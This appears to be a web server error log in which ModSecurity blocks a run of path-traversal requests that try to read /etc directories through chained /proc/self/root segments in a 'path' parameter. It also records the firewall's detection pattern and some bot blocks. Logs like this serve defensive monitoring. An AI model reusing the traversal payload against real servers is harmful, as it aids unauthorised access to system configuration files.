https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:22:54.086655 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:54338] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-buyqAr6etmhZHNpWfAAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:23:02.674982 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:54346] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-dtY0UrI5A3LftIwu1QAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:23:05.403511 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.241.31:55332] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-eew_le52K8_3pV18oAAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:23:14.165789 2026] [proxy_fcgi:error] [pid 17972:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58364] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:23:37.137777 2026] [proxy_fcgi:error] [pid 17972:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:59150] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:23:37.778343 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.244.43:56688] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abn-mdY0UrI5A3LftIwu3QAAAYs"]
[Tue Mar 17 22:23:38.279275 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.241.31:50084] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-muyqAr6etmhZHNpWlAAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:23:39.981181 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.241.31:42582] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-mymAPhZkrhU8w4kRGQAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:23:59.141798 2026] [proxy_fcgi:error] [pid 15051:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:59870] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:24:10.375203 2026] [:error] [pid 2598:tid 140411674785536] [client 74.7.241.31:42588] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-uhj0p0SRWAqcjGGqLAAAAwg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:12.751551 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.241.31:38878] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-vOw_le52K8_3pV18zwAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:14.345475 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.241.31:38890] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-vtY0UrI5A3LftIwu5QAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:16.258998 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.241.31:38894] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-wNY0UrI5A3LftIwu6AAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:17.767514 2026] [:error] [pid 14206:tid 140411658000128] [client 74.7.241.31:39730] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-wemGQQJ-Dl0Hqn5GnwAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:19.473466 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.241.31:39740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-w-oXxyEfFpUF8f8MyQAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:20.858974 2026] [:error] [pid 2598:tid 140411624429312] [client 74.7.241.31:39752] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-xBj0p0SRWAqcjGGqLgAAAw4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:22.129150 2026] [proxy_fcgi:error] [pid 11816:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:60608] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:24:23.539064 2026] [:error] [pid 14206:tid 140411658000128] [client 74.7.241.31:39754] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-x-mGQQJ-Dl0Hqn5GqAAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:23.636253 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.228.61:52484] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abn-x-oXxyEfFpUF8f8M0QAAAVM"]
[Tue Mar 17 22:24:25.293507 2026] [:error] [pid 18211:tid 140411691570944] [client 74.7.241.31:39760] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-yRcIZFNFgEhGGCRHQAAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:26.919314 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:39762] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-yta6ubjKNq_cu4Y10gAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:30.171260 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.241.31:41820] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-zOyqAr6etmhZHNpWoQAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:33.046374 2026] [:error] [pid 17972:tid 140411574073088] [client 74.7.241.31:41830] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-z4Z5-GlpYjVrXCrltAAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:34.379197 2026] [:error] [pid 25836:tid 140411574073088] [client 74.7.241.31:41840] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-0oh-PF_25v4hFRCbZAAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:36.379472 2026] [:error] [pid 15051:tid 140411666392832] [client 74.7.241.31:41842] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-1CmAPhZkrhU8w4kRPAAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:37.943523 2026] [:error] [pid 17972:tid 140411540502272] [client 74.7.241.31:41836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-1YZ5-GlpYjVrXCrluAAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:24:39.939490 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.241.31:41852] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn-19Y0UrI5A3LftIwu7wAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
